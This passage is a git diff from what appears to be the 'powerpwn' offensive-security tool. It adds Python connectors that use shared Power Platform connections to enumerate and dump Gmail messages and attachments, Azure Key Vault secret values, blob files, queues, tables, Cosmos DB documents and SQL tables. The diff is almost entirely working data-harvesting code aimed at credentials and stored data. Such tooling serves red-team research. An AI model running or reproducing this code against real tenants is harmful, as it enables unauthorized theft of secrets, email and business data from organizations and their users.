method="get", + url=f"{self._root}/Mail/{data_record.data_record.record_id}", + params={"includeAttachments": False}, + ) + if success: + extension = "html" if data_record.data_record.extra.get("IsHtml", False) else "txt" + encoding = ENCODING + content = get_email_val["Body"].encode(ENCODING) + + elif data_record.data_record.record_type == DataDumpType.attachment: + success, _, get_email_val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/Mail/{data_record.data_record.record_id}", + params={"includeAttachments": True}, + ) + + if success: + for attachment_obj in get_email_val["Attachments"]: + if attachment_obj["Name"] == data_record.data_record.record_name: + extension = attachment_obj["ContentType"].partition('name="')[2].partition(".")[-1].replace('"', "") + encoding = None + content = attachment_obj["ContentBytes"] + + # We are looking for a specific attachment + break + else: + # Couldn't find relevant attachment + success = False + else: + raise ValueError(f"Unsupported data type: {data_record.data_record.record_type}.") + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: 
{data_record.data_record.record_id}." + ) + + data_dump = DataDump(extension=extension, encoding=encoding, content=content) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_gmail" + + @classmethod + def _apim_path(cls) -> str: + return "gmail" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/keyvault.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/keyvault.py new file mode 100644 index 0000000..0a93d7f --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/keyvault.py @@ -0,0 +1,86 @@ +from typing import List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify + + +class KeyVaultConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + data_stores: List[DataStore] = [] + + can_list_keys, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/keys") + can_list_secrets, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/secrets") + + if can_list_keys or can_list_secrets: + if (account := connection_parameters.get("accountName")) is not None: + pass + elif (account := connection_parameters.get("token:clientId")) is not None: + pass + else: + raise ValueError(f"Couldn't find expected connection parameters. 
Got: {connection_parameters.keys()}.") + + data_stores.append( + DataStore( + tenant=connection_parameters.get("token:TenantId"), + account=account, + scope=None, + host=f"https://{connection_parameters['vaultName'].strip(' ')}.vault.azure.net/", + name=connection_parameters["vaultName"], + extra={}, + ) + ) + + return data_stores + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + + can_list_keys, keys_val = consecutive_gets(session=self._session, expected_status_prefix="200", url=f"{self._root}/keys") + if can_list_keys: + for key_obj in keys_val: + data_records.append(DataRecord(record_type=DataDumpType.key, record_id=key_obj["name"], record_name=key_obj["name"], extra=key_obj)) + + can_list_secrets, secrets_val = consecutive_gets(session=self._session, expected_status_prefix="200", url=f"{self._root}/secrets") + if can_list_secrets: + for secret_obj in secrets_val: + data_records.append( + DataRecord(record_type=DataDumpType.secret, record_id=secret_obj["name"], record_name=secret_obj["name"], extra=secret_obj) + ) + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + if data_record.data_record.record_type == DataDumpType.key: + raise NotImplementedError("Dumping key value has not been implemented.") + elif data_record.data_record.record_type == DataDumpType.secret: + success, _, val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/secrets/{data_record.data_record.record_id}/value", + ) + else: + raise ValueError(f"Unsupported data type: {data_record.data_record.record_type}.") + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." 
+ ) + + secret_value: str = val["value"] + + data_dump = DataDump(extension="txt", encoding=ENCODING, content=secret_value.encode(ENCODING)) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_keyvault" + + @classmethod + def _apim_path(cls) -> str: + return "keyvault" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azureblob.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azureblob.py new file mode 100644 index 0000000..d76777b --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azureblob.py @@ -0,0 +1,120 @@ +import urllib.parse +from typing import Any, Dict, Generator, List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify + + +class SharedAzureBlobConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + data_stores: List[DataStore] = [] + + # we dont have server/database for another auth types + if connection_parameters.get("name", "") != "keyBasedAuth": + return data_stores + + success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection") + + storage_account_name = connection_parameters["values"]["accountName"]["value"] + + # if connection is connected with blob endpoint and not storage account + if storage_account_name.startswith("https://"): + storage_account_name = "AccountNameFromSettings" # a hack # connection_parameters["values"]["accountName"]["value"].split(".blob.core.windows.net")[0].partition("https://")[2] + + if success: + # TODO: with blob storage endpoint, we are getting Storage account name provided in the authentication 'https://exportdatasa.blob.core.windows.net' doesn't match with storage account name provided in the operation parameter + can_list_root_folders, root_folders_val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + property_for_pagination="nextLink", + url=f"{self._root}/v2/datasets/{storage_account_name}/foldersV2", + ) + if can_list_root_folders: + for root_folder in root_folders_val: + data_stores.append( + DataStore( + tenant=None, + scope=None, + account=storage_account_name, + name=root_folder["DisplayName"], + host=f'https://{storage_account_name}.blob.core.windows.net/{root_folder["Name"]}', + extra={"storage_account_name": storage_account_name, "blob_id": root_folder["Id"]}, + ) + ) + + return data_stores + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + folder_obj = {"Id": data_store.data_store.extra["blob_id"], "IsFolder": True} + files = self.__enumerate_folders_content_recursively(data_store.data_store.extra["storage_account_name"], folder_obj) + for file_obj in files: + data_records.append( + DataRecord( + record_type=DataDumpType.file, + record_id=file_obj["Id"], + 
record_name=file_obj["Name"], + extra={"file_path": file_obj["Path"], "media_type": file_obj["MediaType"]}, + ) + ) + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + file_id = urllib.parse.quote(data_record.data_record.record_id) + + success, _, val = request_and_verify( + session=self._session, + expected_status_prefix="200", + is_json_resp=False, + method="get", + url=f"{self._root}/v2/datasets/{data_record.data_store.data_store.extra['storage_account_name']}/files/{file_id}/content", + ) + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." + ) + + document_value = val.encode(ENCODING) + + # add check for mypy + if file_name := data_record.data_record.record_name: + extension = file_name.split(".")[-1] + + last_index_for_extension = file_name.rindex(".") + data_record.data_record.record_name = file_name[:last_index_for_extension] + + data_dump = DataDump(extension=extension, encoding=ENCODING, content=document_value) + return data_dump + + def __enumerate_folders_content_recursively(self, storage_account: str, root_folder: Dict[str, str]) -> Generator[Dict[str, Any], None, None]: + stack = [root_folder] + while len(stack) > 0: + current_folder_obj = stack.pop() + if not current_folder_obj["IsFolder"]: + yield current_folder_obj + else: + current_folder_obj_id = current_folder_obj["Id"] + # TODO: use right pagination method with nextLink + is_success, sub_folders = consecutive_gets( + session=self._session, + expected_status_prefix="200", + property_for_pagination="nextLink", + url=f"{self._root}/v2/datasets/{storage_account}/foldersV2/{current_folder_obj_id}", + ) + if is_success and len(sub_folders) > 0: + stack.extend(sub_folders) + + @classmethod + def api_name(cls) -> str: + return "shared_azureblob" + + @classmethod + def _apim_path(cls) -> str: + return "azureblob" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azurequeues.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azurequeues.py new file mode 100644 index 0000000..4935fd3 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azurequeues.py @@ -0,0 +1,83 @@ +import json +from typing import List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import request_and_verify + + +class SharedAzureQueuesConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + data_stores: List[DataStore] = [] + + # we dont have server/database for another auth types + if connection_parameters.get("name", "") != "keyBasedAuth": + return data_stores + + success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection") + + storage_account_name = 
connection_parameters["values"]["storageaccount"]["value"] + + # if connection is connected with blob endpoint and not storage account + if storage_account_name.startswith("https://"): + storage_account_name = "AccountNameFromSettings" # a hack # connection_parameters["values"]["accountName"]["value"].split(".blob.core.windows.net")[0].partition("https://")[2] + + if success: + can_list_root_queues, _, queues_val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/v2/storageAccounts/{storage_account_name}/queues/list", + ) + if can_list_root_queues: + for queue in queues_val: + data_stores.append( + DataStore( + tenant=None, + scope=None, + account=storage_account_name, + name=queue["Name"], + host=f'https://{storage_account_name}.queue.core.windows.net/{queue["Name"]}', + extra={}, + ) + ) + + return data_stores + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + return [ + DataRecord(record_type=DataDumpType.queue_message, record_id=data_store.data_store.name, record_name=data_store.data_store.name, extra={}) + ] + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + queue_name = data_record.data_record.record_id + + success, _, val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/v2/storageAccounts/{data_record.data_store.data_store.account}/queues/{queue_name}/messages?numofmessages=10", + ) + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." + ) + + messages = val["QueueMessagesList"]["QueueMessage"] + document_value = json.dumps(messages).encode(ENCODING) + + data_dump = DataDump(extension="json", encoding=ENCODING, content=document_value) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_azurequeues" + + @classmethod + def _apim_path(cls) -> str: + return "azurequeues" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azuretables.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azuretables.py new file mode 100644 index 0000000..6787935 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azuretables.py @@ -0,0 +1,82 @@ +import json +from typing import List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify + + +class SharedAzureTablesConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + data_stores: List[DataStore] = [] + + # we dont have server/database for another auth types + # TODO: create connection with table endpoint instead of account name + if connection_parameters.get("name", "") != "keyBasedAuth": + return data_stores + + success, _, _ = request_and_verify(session=self._session, 
expected_status_prefix="200", method="get", url=f"{self._root}/testconnection") + + storage_account_name = connection_parameters["values"]["storageaccount"]["value"] + + # if connection is connected with table endpoint and not storage account + if storage_account_name.startswith("https://"): + storage_account_name = "AccountNameFromSettings" # a hack #connection_parameters["values"]["storageaccount"]["value"].split(".table.core.windows.net")[0].partition("https://")[2] + + if success: + # TODO: with blob storage endpoint, we are getting Storage account name provided in the authentication 'https://exportdatasa.blob.core.windows.net' doesn't match with storage account name provided in the operation parameter + data_stores.append( + DataStore( + tenant=None, + account=storage_account_name, + scope=None, + host=f"https://{storage_account_name}.table.core.windows.net", + name=storage_account_name, + extra={}, + ) + ) + + return data_stores + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + + can_list_tables, tables_val = consecutive_gets( + session=self._session, expected_status_prefix="200", url=f"{self._root}/v2/storageAccounts/{data_store.data_store.name}/tables" + ) + if can_list_tables: + for table_obj in tables_val: + table_name = table_obj["TableName"] + data_records.append(DataRecord(record_type=DataDumpType.table, record_id=table_name, record_name=table_name, extra={})) + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + table_name = data_record.data_record.record_id + success, val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + url=f"{self._root}/v2/storageAccounts/{data_record.data_store.data_store.name}/tables/{table_name}/entities", + ) + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." 
+ ) + + document_value = json.dumps(val).encode(ENCODING) + + data_dump = DataDump(extension="json", encoding=ENCODING, content=document_value) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_azuretables" + + @classmethod + def _apim_path(cls) -> str: + return "azuretables" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_documentdb.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_documentdb.py new file mode 100644 index 0000000..206d0e3 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_documentdb.py @@ -0,0 +1,89 @@ +import json +from typing import List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify + + +class SharedDocumentDBConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + data_stores: List[DataStore] = [] + + # we dont have server/database for another auth types + if connection_parameters.get("name", "") != "keyBasedAuth": + return data_stores + + success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection") + + db_name = connection_parameters["values"]["databaseAccount"]["value"] + + if success: + data_stores.append( + DataStore(tenant=None, account="temp", scope=None, host=f"https://{db_name}.table.cosmos.azure.com:443/", name=db_name, extra={}) + ) + + return data_stores + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + + can_list_databases, databases_val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + property_to_extract_data="Databases", + url=f"{self._root}/v2/cosmosdb/{data_store.data_store.name}/dbs", + ) + if can_list_databases: + for db_obj in databases_val: + db_name = db_obj["id"] + + can_list_collections, collections_val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + property_to_extract_data="DocumentCollections", + url=f"{self._root}/v2/cosmosdb/{data_store.data_store.name}/dbs/{db_name}/colls", + ) + if can_list_collections: + for collection in collections_val: + data_records.append( + DataRecord( + record_type=DataDumpType.collection, + record_id=collection["id"], + record_name=f'{db_name}-{collection["id"]}', + extra={"db_name": db_name}, + ) + ) + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + db_name = data_record.data_record.extra["db_name"] + success, val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + property_to_extract_data="Documents", + url=f"{self._root}/v2/cosmosdb/{data_record.data_store.data_store.name}/dbs/{db_name}/colls/{data_record.data_record.record_id}/docs", + ) + + if not success: + raise ValueError( + f"Unable to fetch value for data type: 
{data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." + ) + + document_value = json.dumps(val).encode(ENCODING) + + data_dump = DataDump(extension="json", encoding=ENCODING, content=document_value) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_documentdb" + + @classmethod + def _apim_path(cls) -> str: + return "documentdb" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_sql.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_sql.py new file mode 100644 index 0000000..5aa3b26 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_sql.py @@ -0,0 +1,97 @@ +import json +from typing import List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify + + +class SharedSqlConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + data_stores: List[DataStore] = [] + + # we dont have server/database for another auth types + # if we use the /servers endpoint for other auth types we will get [] + if not ( + connection_parameters.get("name", "") in ("sqlAuthentication", "windowsAuthentication") + or connection_parameters.get("authType", "") == "windows" + ): + return data_stores + + is_windows = connection_parameters.get("authType", "") == "windows" + + success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection") + + if success: + data_stores.append( + DataStore( + tenant=None, + account="temp", + scope=None, + host=f'https://{connection_parameters["server"]}.database.windows.net' + if is_windows + else f'https://{connection_parameters["values"]["server"]["value"]}', + name=connection_parameters["server"] if is_windows else connection_parameters["values"]["server"]["value"], + extra={}, + ) + ) + + return data_stores + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + + can_list_databases, databases_val = consecutive_gets( + session=self._session, expected_status_prefix="200", url=f"{self._root}/v2/databases?server={data_store.data_store.name}" + ) + if can_list_databases: + for db_obj in databases_val: + db_name = db_obj["Name"] + + can_list_tables, tables_val = consecutive_gets( + session=self._session, expected_status_prefix="200", url=f"{self._root}/v2/datasets/{data_store.data_store.name},{db_name}/tables" + ) + if can_list_tables: + for table in tables_val: + table_display_name = table["DisplayName"] + data_records.append( + DataRecord( + record_type=DataDumpType.table, + record_id=table["Name"], + record_name=f"{db_name}-{table_display_name}", + extra={"db_name": db_name}, + ) + ) + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + server_name = data_record.data_store.data_store.name + db_name 
= data_record.data_record.extra["db_name"] + success, val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + url=f"{self._root}/v2/datasets/{server_name},{db_name}/tables/{data_record.data_record.record_id}/items", + ) + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." + ) + + table_value = json.dumps(val).encode(ENCODING) + + data_dump = DataDump(extension="json", encoding=ENCODING, content=table_value) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_sql" + + @classmethod + def _apim_path(cls) -> str: + return "sql" diff --git a/src/powerpwn/powerdump/collect/data_collectors/data_collector.py b/src/powerpwn/powerdump/collect/data_collectors/data_collector.py new file mode 100644 index 0000000..7b8f87f --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/data_collector.py @@ -0,0 +1,28 @@ +import os +import shutil + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connections_data_collector import ConnectionsDataCollector +from powerpwn.powerdump.utils.model_loaders import get_environment_ids +from powerpwn.powerdump.utils.path_utils import env_collected_data_path +from powerpwn.powerdump.utils.requests_wrapper import init_session + + +class DataCollector: + """ + A Class to collect data from resources and cache them in provided cache path + """ + + def __init__(self, cache_path: str, token: str) -> None: + self.__cache_path = cache_path + self.__session = init_session(token=token) + self.__data_collectors = [ConnectionsDataCollector] + + def collect(self) -> None: + for env_id in get_environment_ids(self.__cache_path): + env_dumps_root_dir = env_collected_data_path(env_id, self.__cache_path) + if os.path.isdir(env_dumps_root_dir): + shutil.rmtree(env_dumps_root_dir) + + for data_collector in self.__data_collectors: + data_collector_instance = data_collector(self.__cache_path) + data_collector_instance.collect(self.__session, env_id, env_dumps_root_dir) diff --git a/src/powerpwn/powerdump/collect/data_collectors/enums/__init__.py b/src/powerpwn/powerdump/collect/data_collectors/enums/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/data_collectors/enums/data_dump_source.py b/src/powerpwn/powerdump/collect/data_collectors/enums/data_dump_source.py new file mode 100644 index 0000000..2eecf7b --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/enums/data_dump_source.py @@ -0,0 +1,7 @@ +from enum import auto + +from powerpwn.enums.str_enum import StrEnum + + +class DataDumpSource(StrEnum): + connections = auto() diff --git a/src/powerpwn/powerdump/collect/data_collectors/enums/data_dump_type.py b/src/powerpwn/powerdump/collect/data_collectors/enums/data_dump_type.py new file mode 100644 index 0000000..f65b81a --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/enums/data_dump_type.py @@ -0,0 +1,14 @@ +from enum import auto + +from powerpwn.enums.str_enum import StrEnum + + +class DataDumpType(StrEnum): + table = auto() + collection = auto() + attachment = auto() + email = auto() + secret = auto() + key = auto() + file = auto() + queue_message = auto() diff --git a/src/powerpwn/powerdump/collect/data_collectors/idata_collector.py b/src/powerpwn/powerdump/collect/data_collectors/idata_collector.py new file mode 100644 index 0000000..2c73942 --- /dev/null +++ 
b/src/powerpwn/powerdump/collect/data_collectors/idata_collector.py @@ -0,0 +1,9 @@ +from abc import ABC, abstractmethod + +import requests + + +class IDataCollector(ABC): + @abstractmethod + def collect(self, session: requests.Session, env_id: str, output_dir: str) -> None: + ... diff --git a/src/powerpwn/powerdump/collect/models/__init__.py b/src/powerpwn/powerdump/collect/models/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/models/base_entity.py b/src/powerpwn/powerdump/collect/models/base_entity.py new file mode 100644 index 0000000..c2c23a2 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/base_entity.py @@ -0,0 +1,22 @@ +from typing import Any + +from pydantic import BaseModel, Field, validator + +from powerpwn.powerdump.collect.models.base_validator import BaseEntityValidator +from powerpwn.powerdump.utils.const import DATA_MODEL_VERSION + + +# noinspection PyRedeclaration +class BaseEntity(BaseModel): + data_model_version: str = Field(title="Data model version", default=DATA_MODEL_VERSION) + + validate_data_model_version: Any = validator("data_model_version", allow_reuse=True)(BaseEntityValidator.validate_data_model_version) + + class Config: + """ + this config tells pydantic BaseModel to use enum values + when converting to dict() instead of enum + """ + + validate_assignment = True + use_enum_values = True diff --git a/src/powerpwn/powerdump/collect/models/base_validator.py b/src/powerpwn/powerdump/collect/models/base_validator.py new file mode 100644 index 0000000..ecb1f8b --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/base_validator.py @@ -0,0 +1,15 @@ +from typing import Any, Dict + +from pydantic import ValidationError + +from powerpwn.powerdump.utils.const import DATA_MODEL_VERSION + + +class BaseEntityValidator: + # noinspection PyUnusedLocal + @classmethod + def validate_data_model_version(cls, data_model_version: str, values: Dict[str, Any]) -> str: + if data_model_version != DATA_MODEL_VERSION: + raise ValidationError(f"Expected DATA_MODEL_VERSION {DATA_MODEL_VERSION}, got {data_model_version}.") + + return data_model_version diff --git a/src/powerpwn/powerdump/collect/models/canvas_app_entity.py b/src/powerpwn/powerdump/collect/models/canvas_app_entity.py new file mode 100644 index 0000000..ff876aa --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/canvas_app_entity.py @@ -0,0 +1,17 @@ +from datetime import datetime +from typing import List + +from pydantic import HttpUrl + +from powerpwn.powerdump.collect.models.principal_entity import Principal +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase + + +class CanvasApp(ResourceEntityBase): + version: str + created_by: Principal + created_at: datetime + last_modified_at: datetime + run_url: HttpUrl + environment_id: str + permissions: List[Principal] diff --git a/src/powerpwn/powerdump/collect/models/connection_entity.py b/src/powerpwn/powerdump/collect/models/connection_entity.py new file mode 100644 index 0000000..21c4d34 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/connection_entity.py @@ -0,0 +1,34 @@ +from datetime import datetime +from typing import Dict, Optional + +from pydantic import Field, HttpUrl + +from powerpwn.powerdump.collect.models.principal_entity import Principal +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase + + +class Connection(ResourceEntityBase): + connection_id: str = Field(..., title="Connection ID") + + is_valid: bool = 
Field(..., title="Has no error indicators") + shareable: bool = Field(..., title="Is connection shareable") + + connector_id: str = Field(..., title="Connector ID") + api_id: str = Field(..., title="API ID") + icon_uri: HttpUrl = Field(..., title="Icon URI") + + environment_id: str = Field(..., title="Environment ID") + environment_name: str = Field(..., title="Environment Name") + + created_at: datetime = Field(title="Created time") + last_modified_at: datetime = Field(title="Last modified time") + expiration_time: Optional[datetime] = Field(title="Expiration time") + + created_by: Principal = Field(..., title="Created by") + + connection_parameters: Dict = Field(..., title="Connection parameters") + test_uri: Optional[HttpUrl] = Field(..., title="Test URI") + + @property + def api_name(self) -> str: + return self.api_id.split("/")[-1] diff --git a/src/powerpwn/powerdump/collect/models/connector_entity.py b/src/powerpwn/powerdump/collect/models/connector_entity.py new file mode 100644 index 0000000..6b471a7 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/connector_entity.py @@ -0,0 +1,55 @@ +import json +from copy import deepcopy +from datetime import datetime +from typing import Dict + +import prance +from pydantic import Field + +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase +from powerpwn.powerdump.utils.json_utils import change_obj_recu + + +class Connector(ResourceEntityBase): + api_name: str = Field(..., title="API Name") + + environment_id: str = Field(..., title="Environment ID") + + swagger: Dict = Field(..., title="OpenAPI spec") + + created_at: datetime = Field(..., title="Creation time") + + last_modified_at: datetime = Field(..., title="Last modified time") + + created_by: str = Field(..., title="Created by") + + version: str = Field(..., title="Connector version") + + def processed_swagger(self, connection_id: str, make_concrete: bool = False) -> Dict: + # avoid side effects + swagger_instance = deepcopy(self.swagger) + + # clean connectionId from path + swagger_instance["paths"] = {k.replace("{connectionId}", connection_id): v for k, v in swagger_instance.get("paths", {}).items()} + + if make_concrete: + # resolve references + parser = prance.ResolvingParser(spec_string=json.dumps(swagger_instance)) + parsed_swagger = parser.specification + + # ensure examples are generate with rich schemas + def _arrays_should_have_min_items(_val: Dict): + if _val.get("type") == "array": + _val["minItems"] = 1 + + change_obj_recu(val=parsed_swagger, obj_changer=_arrays_should_have_min_items) + + def _objects_should_have_all_properties(_val: Dict): + if _val.get("type") == "object" and "required" not in _val: + _val["required"] = list(_val.get("properties", {}).keys()) + + change_obj_recu(val=parsed_swagger, obj_changer=_objects_should_have_all_properties) + else: + parsed_swagger = swagger_instance + + return parsed_swagger diff --git a/src/powerpwn/powerdump/collect/models/data_dump_entity.py b/src/powerpwn/powerdump/collect/models/data_dump_entity.py new file mode 100644 index 0000000..ba51ec4 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/data_dump_entity.py @@ -0,0 +1,18 @@ +from typing import Optional + +from pydantic import Field + +from powerpwn.powerdump.collect.models.base_entity import BaseEntity +from powerpwn.powerdump.collect.models.data_record_entity import DataRecordWithContext +from powerpwn.powerdump.utils.const import ENCODING + + +class DataDump(BaseEntity): + extension: str = Field(..., title="File extension") 
+ encoding: Optional[str] = Field(title="Text encoding", default=ENCODING) + content: bytes = Field(..., title="Content in bytes") + + +class DataDumpWithContext(BaseEntity): + data_record: DataRecordWithContext = Field(..., title="Data record") + data_dump: DataDump = Field(..., title="Data Dump") diff --git a/src/powerpwn/powerdump/collect/models/data_record_entity.py b/src/powerpwn/powerdump/collect/models/data_record_entity.py new file mode 100644 index 0000000..a6c0f71 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/data_record_entity.py @@ -0,0 +1,19 @@ +from typing import Dict, Optional + +from pydantic import Field + +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.base_entity import BaseEntity +from powerpwn.powerdump.collect.models.data_store_entity import DataStoreWithContext + + +class DataRecord(BaseEntity): + record_type: DataDumpType = Field(..., title="Record type") + record_id: str = Field(..., title="Record ID") + record_name: Optional[str] = Field(..., title="Record display name") + extra: Dict = Field(..., title="Additional information") + + +class DataRecordWithContext(BaseEntity): + data_store: DataStoreWithContext = Field(..., title="Data Store") + data_record: DataRecord = Field(..., title="Data Record") diff --git 